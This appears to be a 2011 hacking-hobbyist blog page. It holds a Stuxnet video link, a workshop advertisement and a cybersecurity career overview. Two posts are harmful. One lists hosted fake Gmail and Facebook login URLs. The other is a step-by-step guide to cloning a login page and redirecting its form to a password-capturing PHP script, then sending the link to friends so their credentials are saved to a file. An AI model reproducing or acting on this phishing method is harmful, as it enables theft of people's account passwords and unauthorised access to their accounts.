Monday, March 21, 2011

Stuxnet Worm

Stuxnet Worm Installation, Injection, Mitigation And Prevention

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXd96Jf9ZQtqcLAzQk9oFrD5TSHrNvUodlPwsGUpsjoWHBToiQEoPDUBK3Op2xPYv0fPvuCI3ZI3iYXMOPdyHWvgoDgMEWgAfdf4vhAvO1Cexva90UkG8UwaE9EIVNdy-9kVeSHo1X6f4/s200/stuxnet-threat.jpg

Stuxnet is one of the most popular windows worm, It was discovered back in July 2010 and it has attracted lots of media attention. It was also claimed that Stuxnet worm was originally devloped to target Iranian nuclear plants. Some security experts claim that Stuxnet worm is the most dangerous malware ever created.
While searching on internet related to stuxnet I came across two videos on infosecinstitute.com by Joel langill which probably explains every part of stuxnet, From it's introduction, Installation, and Injection to it's mitigation and prevention.

Stuxnet Worm Installation, Injection, Mitigation And Prevention [Video]

Posted by at No comments:

Tuesday, March 15, 2011

FAKEPAGES

GMAIL: http://newnew.my3gb.com/gmail/ServiceLogin.htm

FACEBOOK: http://newnew.my3gb.com/facebook/index1.html
Posted by at No comments:

Monday, March 14, 2011

Two Day workshop

Date : 19th & 20th march 2011,
Venue :Appin Dilsukhnagar.
Duration: 12hrs
Per Day :6hrs
Kit Free : (Tools Cds,Hard Copy Material*)
Registration Last Date :17th March****
Limited Seats*-First Come First Serve.
Registrations might close before 17th if the batch is filled.
Posted by at No comments:

How to Make Fake Login Page

create fake webpage with blocked images in order to get the victim pass:

For this we require .php file for getting password.

it is available in hacking sites related to phishing.

# Open any page for which you wanna make fake. (For example: Gmail.com)

# Save page . In the saving option it asks for save as type select complete webpage.(Ctrl + s)

# Now where u have save the page it will be showing u that page and a dir wid images on the page.

# Now Rite Click on the Page and click edit.

# Press ctrl+f and search for action.

# Now delete data in double coat("") and type safin.php(We'll get different .php files in net for phishing.I got safin.php for getting password.)

# Save and close the editor.

# Upload the Directory with images ,safin.php and this Page on free hosting site.(Now i am using my3gb.com)

# After uploading click on the modified page edit option and add images there(use our previous uploaded images urls for adding) and save it.

# After that click on the modified content,copy that url and send it to friends.

# When he/she login on it the id and password comes to pass.txt (It'll create itself).

GmailFakepage:http://newnew.my3gb.com/gmail/ServiceLogin.htm
Posted by at No comments:

Wednesday, March 9, 2011

Career in Cybersecurity

Cybersecurity professionals protect data and systems in networks that are connected to the internet. Cybercriminals or hackers strike in various ways by virus attacks, which may erase your entire system or someone can steal confidential information from your systems or even break into your systems and modify your files without your knowledge.

A computer hacker finds out the loopholes in a system and breaks into it, the information security professional, or an ethical hacker has a similar job. He needs to think like a hacker and find the loopholes in the system before a hacker can get to them.

An Information Security Professional may have to work on one of the following job profiles.

Job Profile

The job of a cybersecurity professional include the following.

  1. Ethical Hacking into a company’s network to find out what security loopholes need to be fixed
  2. Creating security policy for an organisation
  3. 24×7 remote management of security products like firewall
  4. Security auditing, that is, compiling a report on a company’s security system to see if it matches standards
  5. Cyber Forensics, that is, clinical investigation of computer crimes/frauds
  6. Training

Demand Estimates

industry is estimated that there would be a shortfall of 35,000 to 45,000 Cybersecurity Professionals in India alone.

Career Path

  1. Entry Level - IS Executive Manager (Role: to correlate broad security guidelines of the organisation with security operations.)
  2. Middle Level – IS Manager (Role: Security program management, data security, ploicy creation/maintenance, business continuity/ disaster recovery)
  3. Senior & Top Level – Chief IS Manager (Role: Design and development of information security policy. Regulatory compliance, information security governance)
  4. Senior & Top Level – Security Advisors / Auditors (Role: Advisory services for information security, policy design, risk assessment, compliance to global/industry standards)
  5. Senior & Top Level – Chief Information Officer (Role: Justifying the cost of ongoing and future investments to mitigate information risks, aligning business objectives with a concise security strategy)

Qualifications

Graduate in any discipline, but software engineers would have preference. A good knowledge of networks and understanding of hackers mind is essential. It is recommended that one does a course in Cyber Security. Such courses would help a erson learn the tricks of the trade, it does not help joining a course for a few days, but it is recommended that one joins reputed certificate programs and long term programs. Certifications like CISA (Certified Information System Auditor), CISM (Certified Information Security Management) and CISSP (Certified Information Systems Security Professionals) would help a person to start a career in Cybersecurity. Other vendor specific certifications like CCSP (Cisco Certified Security Professional) and MCSE (Microsoft Certified Systems Engineer) also help.

Expected Renumeration

A person with an years experience can expect Rs.3 Lakh per annum. Those with 5 years can get upto 8-10 Lakhs. Those with certifications like CISM, CISSP and CISA can expect annual salaries of $100,000 .
Posted by at No comments:
Subscribe to: Comments (Atom)